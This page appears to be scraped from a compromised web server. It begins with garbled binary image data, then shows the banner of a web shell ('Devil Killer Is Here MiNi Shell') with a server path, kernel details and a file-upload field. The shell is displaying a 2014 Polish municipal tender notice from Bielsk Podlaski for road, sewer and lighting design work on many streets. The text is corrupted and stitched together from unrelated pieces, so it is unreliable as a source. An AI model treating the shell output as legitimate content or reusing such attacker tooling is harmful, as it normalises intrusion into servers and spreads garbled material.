JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140212/49450-N-2014.html

<p class="kh_header"><b>Bielsk Podlaski: BUDOWA NAWIERZCHNI, KANALIZACJI SANITARNEJ I DESZCZOWEJ W ULICACH: KRUCZEJ, SIKORSKIEGO (OD UL. REJTANA DO UL. KOWALSKIEJ), KOCHANOWSKIEGO, MATEJKI, KOŁŁĄTAJA, KOWALSKIEJ, PLATER, WSCHODNIEJ, HARCERSKIEJ, BRONIEWSKIEGO, GRUNWALDZKIEJ, OKRĘŻNEJ, MŁYNOWEJ, DROGI DO HRYNIEWICZ   - DOKUMENTACJA PROJEKTOWA.</b><br>
<b>Numer ogłoszenia: 49450 - 2014; data zamieszczenia: 12.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Bielsk Podlaski , ul. Kopernika 1, 17-100 Bielsk Podlaski, woj. podlaskie, tel. 085 7318100, faks 085 7318150.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bielsk-podlaski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA NAWIERZCHNI, KANALIZACJI SANITARNEJ I DESZCZOWEJ W ULICACH: KRUCZEJ, SIKORSKIEGO (OD UL. REJTANA DO UL. KOWALSKIEJ), KOCHANOWSKIEGO, MATEJKI, KOŁŁĄTAJA, KOWALSKIEJ, PLATER, WSCHODNIEJ, HARCERSKIEJ, BRONIEWSKIEGO, GRUNWALDZKIEJ, OKRĘŻNEJ, MŁYNOWEJ, DROGI DO HRYNIEWICZ   - DOKUMENTACJA PROJEKTOWA..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej na budowę nawierzchni, kanalizacji sanitarnej i deszczowej w ulicach: Kruczej, Sikorskiego (od ul. Rejtana do ul. Kowalskiej), Kochanowskiego, Matejki, Kołłątaja, Kowalskiej, Plater, Wschodniej, Harcerskiej, Broniewskiego, Grunwaldzkiej, Okrężnej, Młynowej, drogi do Hryniewicz wg załączonych  map w następującym zakresie:
1. ul. Krucza - dł. ok. 550 m
-budowa nawierzchni jezdni, pasa pieszo-jezdnego, chodników, zjazdów, zieleńce,
-budowa i przebudowa kanalizacji deszczowej,
-budowa kanalizacji sanitarnej głównej i bocznej w granicach pasa drogowego po uzgodnieniu kierunku odpływu z właścicielami działek na odcinku od drogi bocznej do ul. Rejonowej oraz w drodze bocznej,
-budowa sieci wodociągowej na brakujących odcinkach ulicy,
-budowa i przebudowa oświetlenia ulicznego,
-projekt stałej organizacji ruchu (o ile będzie konieczne),
-w razie potrzeby - przebudowa istniejącej infrastruktury technicznej, kolidującej z budowanymi   i przebudowywanymi elementami pasa drogowego.
Teren objęty opracowaniem oznaczono na mapie liczbami od 1 do 17. 
Uwaga: 
1.	Dla terenu obejmującego ul. Kruczą, sporządzony jest Miejscowy Plan Zagospodarowania Przestrzennego, zgodnie z którym zachodzi konieczność przejęcia części działek, niebędących własnością inwestora. W związku z powyższym niezbędne będzie przygotowanie przez wykonawcę dokumentacji projektowej oraz niezbędnych materiałów w celu uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej. 
2.	Na zlecenie Przedsiębiorstwa Komunalnego Sp. z o.o. w Bielsku Podlaskim powstaje dokumentacja projektowa na budowę kanalizacji sanitarnej w ul. Kruczej na odcinku od posesji nr 4 do drogi bocznej odchodzącej od ul. Kruczej. W związku z powyższym należy skoordynować przyszłe prace projektowe z realizowaną obecnie dokumentacją.

2. ul. Sikorskiego (od ul. Rejtana do ul. Kowalskiej) - dł. ok. 380 m
-budowa i przebudowa nawierzchni jezdni, pasa pieszo-jezdnego, chodników, zjazdów, zieleńce,
-budowa i przebudowa kanalizacji deszczowej,
-budowa kanalizacji sanitarnej głównej i bocznej w granicach pasa drogowego po uzgodnieniu kierunku odpływu z właścicielami działek,
-budowa i przebudowa sieci wodociągowej wraz z istniejącymi przyłączami w granicach pasa drogowego,
-budowa i przebudowa oświetlenia ulicznego,
-projekt stałej organizacji ruchu (o ile będzie konieczne),
-w razie potrzeby - przebudowa istniejącej infrastruktury technicznej, kolidującej z budowanymi  i przebudowywanymi elementami pasa drogowego.
Teren objęty opracowaniem oznaczono na mapie liczbami od 18 do 29. 
3. ul. Kochanowskiego - dł. ok. 370 m
-budowa i przebudowa nawierzchni jezdni, chodników, zjazdów, zieleńce,
-przebudowa kanalizacji deszczowej,
-budowa kanalizacji sanitarnej głównej i bocznej w granicach pasa drogowego po uzgodnieniu kierunku odpływu z właścicielami działek,
-przebudowa sieci wodociągowej wraz z istniejącymi przyłączami w granicach pasa drogowego,
-przebudowa oświetlenia ulicznego,
-projekt stałej organizacji ruchu (o ile będzie konieczne),
-w razie potrzeby - przebudowa istniejącej infrastruktury technicznej, kolidującej z budowanymi  i przebudowywanymi elementami pasa drogowego.
Teren objęty opracowaniem oznaczono na mapie liczbami od 30 do 46. 
4. ul. Matejki - dł. ok. 90 m 
-budowa i przebudowa nawierzchni jezdni, chodników, zjazdów, zieleńce,
-przebudowa kanalizacji deszczowej,
-budowa kanalizacji sanitarnej głównej i bocznej w granicach pasa drogowego po uzgodnieniu kierunku odpływu z właścicielami działek,
-przebudowa sieci wodociągowej wraz z istniejącymi przyłączami w granicach pasa drogowego,
-przebudowa oświetlenia ulicznego,
-projekt stałej organizacji ruchu (o ile będzie konieczne),
-w razie potrzeby - przebudowa istniejącej infrastruktury technicznej, kolidującej z budowanymi  i przebudowywanymi elementami pasa drogowego.
Teren objęty opracowaniem oznaczono na mapie liczbami od 47 do 54. 
5. ul. Kołłątaja - dł. ok. 110 m
-budowa i przebudowa nawierzchni jezdni, chodników, zjazdów, zieleńce,
-przebudowa kanalizacji deszczowej,
-budowa kanalizacji sanitarnej głównej i bocznej w granicach pasa drogowego po uzgodnieniu kierunku odpływu z właścicielami działek,
-przebudowa sieci wodociągowej wraz z istniejącymi przyłączami w granicach pasa drogowego,
-przebudowa oświetlenia ulicznego,
-projekt stałej organizacji ruchu (o ile będzie konieczne),
-w razie potrzeby - przebudowa istniejącej infrastruktury technicznej, kolidującej z budowanymi  i przebudowywanymi elementami pasa drogowego.
Teren objęty opracowaniem oznaczono na mapie liczbami od 55 do 62. 
6. ul. Kowalska - dł. ok. 750 m
-budowa i przebudowa nawierzchni jezdni, pasów pieszo-jezdnych, ciągu pieszego, chodników, zjazdów, zieleńce,
-przebudowa kanalizacji deszczowej,
-budowa kanalizacji sanitarnej głównej i bocznej w granicach pasa drogowego po uzgodnieniu kierunku odpływu z właścicielami działek,
-przebudowa sieci wodociągowej wraz z istniejącymi przyłączami w granicach pasa drogowego,
-budowa i przebudowa oświetlenia ulicznego,
-projekt stałej organizacji ruchu (o ile będzie konieczne),
-w razie potrzeby - przebudowa istniejącej infrastruktury technicznej, kolidującej z budowanymi  i przebudowywanymi elementami pasa drogowego.
Teren objęty opracowaniem oznaczono na mapie liczbami od 89 do 122. 
7. ul. Plater - dł. ok. 240 m
-budowa nawierzchni pasa pieszo-jezdnego, 
-przebudowa kanalizacji deszczowej,
-budowa kanalizacji sanitarnej głównej i bocznej w granicach pasa drogowego po uzgodnieniu kierunku odpływu z właścicielami działek,
-przebudowa sieci wodociągowej wraz z istniejącymi przyłączami w granicach pasa drogowego,
-przebudowa oświetlenia ulicznego,
-projekt stałej organizacji ruchu (o ile będzie konieczne),
-w razie potrzeby - przebudowa istniejącej infrastruktury technicznej, kolidującej z budowanymi  i przebudowywanymi elementami pasa drogowego.
Teren objęty opracowaniem oznaczono na mapie liczbami od 123 do 129.        

8. ul. Wschodnia - dł. ok. 790 m
-budowa i przebudowa nawierzchni jezdni, chodników, zjazdów, zieleńce,
-budowa i przebudowa kanalizacji deszczowej,
-budowa kanalizacji sanitarnej głównej i bocznej w granicach pasa drogowego po uzgodnieniu kierunku odpływu z właścicielami działek,
-budowa i przebudowa sieci wodociągowej wraz z istniejącymi przyłączami w granicach pasa drogowego,
-budowa i przebudowa oświetlenia ulicznego,
-projekt stałej organizacji ruchu (o ile będzie konieczne),
-w razie potrzeby - przebudowa istniejącej infrastruktury technicznej, kolidującej z budowanymi i przebudowywanymi elementami pasa drogowego.
Teren objęty opracowaniem oznaczono na mapie liczbami od 130 do 148. 
9. Harcerska - dł. ok. 170 m
-budowa i przebudowa nawierzchni jezdni, chodników, zjazdów, zieleńce,
-przebudowa kanalizacji deszczowej,
-budowa kanalizacji sanitarnej głównej i bocznej w granicach pasa drogowego po uzgodnieniu kierunku odpływu z właścicielami działek,
-przebudowa oświetlenia ulicznego,
-projekt stałej organizacji ruchu (o ile będzie konieczne),
-w razie potrzeby - przebudowa istniejącej infrastruktury technicznej, kolidującej z budowanymi  i przebudowywanymi elementami pasa drogowego.
Teren objęty opracowaniem oznaczono na mapie liczbami od 149 do 152. 
Uwaga: 
Na zlecenie Przedsiębiorstwa Komunalnego Sp. z o.o. w Bielsku Podlaskim powstaje dokumentacja projektowa na przebudowę sieci wodociągowej wraz z przyłączami w granicach pasa drogowego ulicy Harcerskiej. W związku z powyższym należy skoordynować przyszłe prace projektowe z realizowaną obecnie dokumentacją.

10. Broniewskiego - dł. ok. 560 m
-budowa i przebudowa nawierzchni jezdni, ciągu pieszego, chodników, zjazdów, zieleńce,
-budowa i przebudowa kanalizacji deszczowej,
-budowa kanalizacji sanitarnej głównej i bocznej w granicach pasa drogowego po uzgodnieniu kierunku odpływu z właścicielami działek,
-przebudowa sieci wodociągowej wraz z istniejącymi przyłączami w granicach pasa drogowego,
-przebudowa oświetlenia ulicznego,
-projekt stałej organizacji ruchu (o ile będzie konieczne),
-w razie potrzeby - przebudowa istniejącej infrastruktury technicznej, kolidującej z budowanymi  i przebudowywanymi elementami pasa drogowego.
Teren objęty opracowaniem oznaczono na mapie liczbami od 153 do 174. 
11. Grunwaldzka - dł. ok. 270 m
-budowa i przebudowa nawierzchni jezdni, chodników, zjazdów, zieleńce,
-przebudowa kanalizacji deszczowej,
-budowa kanalizacji sanitarnej głównej i bocznej w granicach pasa drogowego po uzgodnieniu kierunku odpływu z właścicielami działek,
-przebudowa sieci wodociągowej wraz z istniejącymi przyłączami w granicach pasa drogowego,
-przebudowa oświetlenia ulicznego,
-projekt stałej organizacji ruchu (o ile będzie konieczne),
-w razie potrzeby - przebudowa istniejącej infrastruktury technicznej, kolidującej z budowanymi  i przebudowywanymi elementami pasa drogowego.
Teren objęty opracowaniem oznaczono na mapie liczbami od 175 do 189. 
12. Okrężna - dł. ok. 390 m
-budowa i przebudowa nawierzchni jezdni, pasa pieszego, chodników, zjazdów, zieleńce,
-budowa kanalizacji deszczowej,
-budowa kanalizacji sanitarnej głównej i bocznej w granicach pasa drogowego po uzgodnieniu kierunku odpływu z właścicielami działek,
-przebudowa sieci wodociągowej wraz z istniejącymi przyłączami w granicach pasa drogowego od ul. Rejtana (sklep PSS posesja nr 37) do posesji nr 13,
-przebudowa oświetlenia ulicznego,
-projekt stałej organizacji ruchu (o ile będzie konieczne),
-w razie potrzeby - przebudowa istniejącej infrastruktury technicznej, kolidującej z budowanymi i przebudowywanymi elementami pasa drogowego.
Teren objęty opracowaniem oznaczono na mapie liczbami od 63 do 88. 
13. Młynowa - dł. ok. 290 m
-przebudowa i budowa nawierzchni jezdni, chodników, zjazdów, zieleńce,
-przebudowa kanalizacji deszczowej,
-budowa kanalizacji sanitarnej głównej i bocznej w granicach pasa drogowego po uzgodnieniu kierunku odpływu z właścicielami działek,
-przebudowa sieci wodociągowej wraz z istniejącymi przyłączami w granicach pasa drogowego,
-przebudowa oświetlenia ulicznego,
-projekt stałej organizacji ruchu (o ile będzie konieczne),
-w razie potrzeby - przebudowa istniejącej infrastruktury technicznej, kolidującej z budowanymi  i przebudowywanymi elementami pasa drogowego.
Teren objęty opracowaniem oznaczono na mapie liczbami 154, 154/1 - 154/6, 155 i 168, 168/1, 168/2, 169.
14. Droga do Hryniewicz - dł. ok.1050 m 
-budowa nawierzchni jezdni z poboczami, zjazdów, odwodnienia rowami przydrożnymi, przepustów pod drogą i zjazdami,
-projekt stałej organizacji ruchu (o ile będzie konieczne),
-w razie potrzeby - przebudowa istniejącej infrastruktury technicznej, kolidującej z budowanymi  i przebudowywanymi elementami pasa drogowego.
Teren objęty opracowaniem oznaczono na mapie liczbami od 190 do 200 i od 201 do 208. 
2.   Wykonawca uzyska wszelkie wymagane, zgodnie z polskim prawem, uzgodnienia, opinie i decyzje administracyjne, niezbędne do opracowania dokumentacji projektowej, w tym między innymi:
 a)  przygotuje niezbędne materiały i wniosek do uzyskania przez Inwestora decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia,
 b)  przygotuje niezbędne materiały i wniosek do uzyskania przez Inwestora decyzji o ustaleniu lokalizacji inwestycji celu publicznego,
 c)  opracuje operat wodnoprawny i przygotuje niezbędne dokumenty i wniosek do uzyskania przez Inwestora pozwolenia wodnoprawnego wraz z wykonaniem wszelkich niezbędnych do tego celu badań, opracowań i analiz ,
d) pozyska mapę zasadniczą w skali 1:500, aktualny wtórnik sporządzony przez uprawnionego geodetę,
e)    wykona badania geotechniczne gruntu,
f)  uzyska wszelkie uzgodnienia, opinie i materiały niezbędne do uzyskania decyzji     o zezwoleniu na realizację inwestycji drogowej ( ul. Zamkowej ) i decyzji o pozwoleniu na budowę  ( pozostałe ulice ) przez Inwestora,  
g)   opracuje  inne, uznane  za  konieczne  przez  Wykonawcę  bądź  stosowne instytucje i urzędy, opracowania  i  badania,
h)    opracuje przedmiary robót,
i)    opracuje kosztorysy inwestorskie zgodnie z założeniami wyjściowymi do kosztorysowania uzgodnionymi z Inwestorem, Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004r. Nr 130 poz. 1389) oraz ustawą Prawo zamówień publicznych ( Dz. U z 2013r. poz. 907 z póź. zm.),
j)   udzieli wyjaśnień, dotyczących rozwiązań projektowych na etapie wyboru Wykonawcy robót budowlanych,
k) na wniosek Inwestora dokona aktualizacji kosztorysu inwestorskiego, zgodnie z wymogami ustawy Prawo zamówień publicznych.
l)     sprawował będzie nadzór autorski w trakcie realizacji robót.
3.  Przed przystąpieniem do projektowania, Wykonawca opracuje koncepcję proponowanych   rozwiązań i przedłoży ją do akceptacji Zamawiającego, jak również uzyska akceptację jednostek opiniujących. 
 4. Opracowana dokumentacja powinna zawierać:
- projekty budowlane po 5 egz. + CD /JPG/,
- projekty wykonawcze po 5 egz. + CD /JPG/,
- przedmiary  robót po 2 egz. + CD (w formacie Excel),
- kosztorysy inwestorskie po 2 egz. + CD (w formacie  Excel),
- kosztorysy ofertowe po 2 egz. + CD (w formacie Excel),
- specyfikacje techniczne wykonania i odbioru robót (STWiOR) po 3 egz. + CD ( MS WORD),
- projekty stałej organizacji ruchu po 4 egz. + CD (pdf),
- projekty zagospodarowania zieleni - wycinki i nasadzeń drzew  (o ile będą konieczne) po 5 egz. + CD (pdf),
-  operaty wodnoprawne + pozwolenia wodnoprawne (o ile będą konieczne) po 3 egz.+ CD (pdf),
-   opracowania, dotyczące badań geotechnicznych gruntu po 3 egz. + CD (pdf),
-   informacje BIOZ po 5 egz. + CD (pdf),
Wszelkie wymagane opracowania przekazane zostaną Zamawiającemu także w wersji elektronicznej (pliki nie większe niż 10 Mb) dla potrzeb przeprowadzenia postępowania o udzielenie zamówienia publicznego na wybór wykonawcy robót..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia tego warunku, Wykonawca winien wykazać, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej 2 zamówienia na wykonanie dokumentacji projektowej dot. przebudowy lub budowy ulicy w zakresie  branży drogowej, sanitarnej i elektrycznej, z podaniem dat wykonania  i podmiotów , na rzecz których usługi  zostały wykonane oraz załączeniem dowodów, czy zostały  wykonane lub są wykonywane należycie ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wykonawca winien wykazać, że dysponuje  co najmniej 1 osobą posiadającą uprawnienia do projektowania w  specjalności : drogowej bez ograniczeń, sanitarnej bez ograniczeń i elektrycznej bez ograniczeń</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy (wg załącznika Nr 1 do SIWZ).
2. Pełnomocnictwo - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy została złożona przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w zakresie przedłużenia terminu wykonania przedmiotu umowy w przypadku uzasadnionej wydłużającej się procedury uzgodnień, wydawania decyzji administracyjnych itp..</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bielsk-podlaski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Bielsk Podlaski ul. Kopernika 1, 17-100 Bielsk Podlaski.</p>
